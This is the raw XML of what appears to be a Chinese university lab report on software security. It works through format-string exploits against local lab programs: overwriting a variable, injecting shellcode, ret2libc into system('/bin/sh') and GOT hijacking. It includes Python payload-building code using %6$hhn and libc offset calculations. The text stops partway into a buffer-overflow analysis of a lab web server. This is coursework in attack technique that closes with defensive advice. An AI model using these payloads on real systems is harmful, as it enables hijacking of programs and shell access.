          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，分析prog1程序调用printf时的栈帧，如图1-1所示，由于内存对齐，变量var位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>esp+0x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，缓冲区input位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>esp+0x18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C0CD3">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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利用printf格式化字符串%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$hhn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，需要在第x个参数位置处放置需要写的内存的地址，如图栈帧所示，可控制的缓冲区位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>esp+0x18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>位置，对应printf第6个参数，为避免打印大量字符，使每一个参数控制var变量的一个字节，根据待写入的目标值计算每一次需要打印的字符数量，实现向var变量写入任意数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D08969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1802130" cy="1550670"/>
            <wp:effectExtent l="9525" t="9525" r="17145" b="209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1550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6B4A7D">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50"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1-1 printf栈帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3D547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对应的攻击代码如下（重复部分已省略）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A615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payload += (var_addr+0).to_bytes(4,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'little'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D2ED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payload += (var_addr+1).to_bytes(4,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'little'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F074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payload += (var_addr+2).to_bytes(4,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'little'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C06F74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payload += (var_addr+3).to_bytes(4,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'little'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E426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num_char = 16  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAA41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62C772E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inc = (0x100 + ((var_value &gt;&gt; 0) &amp; 0xFF) - (num_char % 0x100)) % 0x100  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F7EE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(inc != 0):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BD65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num_char += inc  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C42693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payload += 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"%{inc}c"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.encode()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F176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payload += b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'%6$hhn'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78511A21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关闭ASLR编译运行程序测试，如图1-2所示，成功修改var变量值为0x66887799和0xdeadbeef。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C31AF1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4937760" cy="2999105"/>
            <wp:effectExtent l="9525" t="9525" r="24765" b="203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9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F97BD4">
      <w:p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1-2 prog1运行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C433145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针对prog2，完成以下任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD43296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/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以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>任务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需关闭ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63664C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启Stack Guard保护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并关闭栈不可执行保护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通过shellcode注入进行利用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获得shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF9F2D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与实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.2.1相似，prog2程序给出了栈帧地址与输入缓冲区地址，栈帧地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>即为fmtstr函数返回地址，由于栈可执行，因此可以将shellcode写入缓冲区，再将fmtstr函数的返回地址修改为shellcode地址，即可在返回时实现跳转到shellcode并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02463C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使用-m32 -g -no-pie -fstack-protector -z execstack编译prog2.c，关闭ASLR运行测试，测试结构如图1-3所示，成功修改fmtstr返回地址，执行shellcode并获取shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1148E72E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4806315" cy="1742440"/>
            <wp:effectExtent l="9525" t="9525" r="22860" b="196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742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7BA95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图1-3 shellcode测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41120F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="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开启Stack Guard保护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并开启栈不可执行保护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通过ret2lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行利用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获得shel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以通过调用system(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）；（提示：需要查找libc中的system函数和“/bin/sh”地址）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D653961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开启栈不可执行保护后，无法执行写入栈中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shellcode，但仍可通过修改程序返回地址实现控制程序执行流，将system函数地址写入到fmtstr返回地址处，即可实现在fmtstr返回时执行system函数，除了修改fmtstr函数返回地址，还需要控制system函数的参数，由于32位系统下函数参数位于栈中，因此只需要将对应的栈地址写入“/bin/bash”字符串地址，即可实现在fmtstr返回时调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system(“/bin/sh”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，从而获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635712E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使用ldd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>./prog2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令查看libc加载地址；使用readelf -a /lib/i386-linux-gnu/libc.so.6 | grep " system"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令查看system函数在libc中的偏移地址；使用ropper --file /lib/i386-linux-gnu/libc.so.6 --string "/bin/sh" 命令查看"/bin/sh"字符串在libc中的偏移地址。如图1-4所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA397CE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5039995" cy="2038985"/>
            <wp:effectExtent l="9525" t="9525" r="17780" b="279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3044EF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1-4 libc相关地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6278C882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利用上述地址信息计算得到返回地址、参数地址等：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8E44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system_addr = 0xf7d83000 + 0x48170  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79983A0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binsh_addr = 0xf7d83000 + 0x1bd0d5  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99DF1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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># 参数地址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64B3570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arg_addr = 0xffffd308 + 12  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC57B0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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># 返回地址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76F539A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ret_addr = 0xffffd308 + 4  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AACAF2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使用-m32 -g -no-pie -fstack-protector -z noexecstack选项编译prog2.c，开启栈不可执行保护，运行程序测试，如图1-5所示，成功修改返回地址并调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system(“/bin/sh”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF44FE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5145405" cy="2797175"/>
            <wp:effectExtent l="9525" t="9525" r="2667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279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354604">
      <w:pPr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1-5 ret2libc测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F8FE4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针对prog2，完成以下任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A21DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="0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以下任务，需开启ASLR；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C38C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="0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开启Stack Guard保护，并开启栈不可执行保护，通过GOT表劫持，调用win函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E370A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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c语言程序调用libc中的库函数时，使用plt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.got</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>机制实现，GOT表中保持着需要调用的函数的地址，通过修改GOT表，将需要执行的函数写入printf对应的GOT表中，即可在调用printf时调用指定的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F6F24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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使用-m32 -g -no-pie -fstack-protector -z noexecstack选项编译prog2.c，分析prog2程序的printf对应的GOT表项的地址与win函数的地址，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%x$hhn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将win函数地址写入printf对应的GOT表项中，如图1-6所示，程序成功调用win函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B311FCA">
      <w:pPr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5001260" cy="1475105"/>
            <wp:effectExtent l="9525" t="9525" r="18415" b="203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475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E17B9">
      <w:pPr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1-6 GOT表劫持测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776E3A5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc1956153719"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4C386917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在本次实验中，通过利用程序中的格式化字符串漏洞，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%x$hnn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>向指定地址处写入指定数据，实现了数据篡改、shellcode执行、ret2libc与GOT表劫持等多种软件攻击，了解了格式化字符串漏洞的危害，在实际开发中，应谨慎处理用户输入，禁止将用户输入作为格式化字符串使用，避免产生格式化字符串漏洞，从而避免软件攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC70325">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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在本实验中，虽然程序能够输出对应的地址，且关闭了地址随机化，但重新运行程序时，有时相应的地址仍会发生变化，需要手动修改攻击脚本中的地址，建议使用自动获取地址的方式，避免频繁修改攻击脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20026807">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Toc963132795"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验二 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="38C4E518">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc508567693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489AF3EA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特权隔离( Privilege Separation )、最小特权( Least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Privilege)、安全的错误处理(Fail Securely)等等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是安全设计重要原则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本实验的目的是通过系统提供的安全机制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对程序进行安全增强。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9EFB5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本实验涵盖以下方面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508CE164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0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chro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE71A3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0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改变进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>euid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13164ACB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>seccomp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B25F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AppArmor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6519F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc1937188480"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0DD4F866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删除特权文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C8B85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分析web server程序，服务器由三个主要部分组成：服务器（server）、HTTP请求调度器（httpd）和两个服务（Filesv、Banksv）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E26B0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服务器启动HTTP调度器httpd，以及两个服务：filesv和banksv。服务器接受80端口的连接，并将请求路由到HTTP调度器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70739EC7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HTTP调度器从传来的套接字中读取请求行，并决定该请求属于哪一类（GET、POST等）。接下来，调度器httpd将把请求路由到相应的服务，该服务继续读取HTTP headers和body，并做出适当的回应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D4DC13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在banksv程序中，调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Parse_parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数处理sockfd的字节流数据，Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数位于parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码中，在Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中又调用parseHeaders函数解析请求头，在parseHeaders函数中通过advance(fd,1)读取请求头，进一步调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处理sockfd数据，调用关系如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A2293">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule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banksv-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&gt;Parse_parse-&gt;parseHeaders-&gt;advance-&gt;getToken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BB9B1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分析getToken代码发现，函数缓冲区大小为1024，函数内使用getchar逐个字符读取HTTP请求头，每读取一个字符将其放入缓冲区，直到读取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>序列退出循环结束循环将缓冲区内数据拷贝到全局缓冲区。在上述操作中，向缓冲区中写入字符未校验已写入的数量，因此存在缓冲区溢出漏洞，又因为缓冲区位于栈上且未开启栈溢出保护，因此可以通过栈溢出实现覆盖getToken函数返回地址，进而控制程序的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D84D12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测试栈溢出覆盖返回地址所需要的字符数量，填充栈需要1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
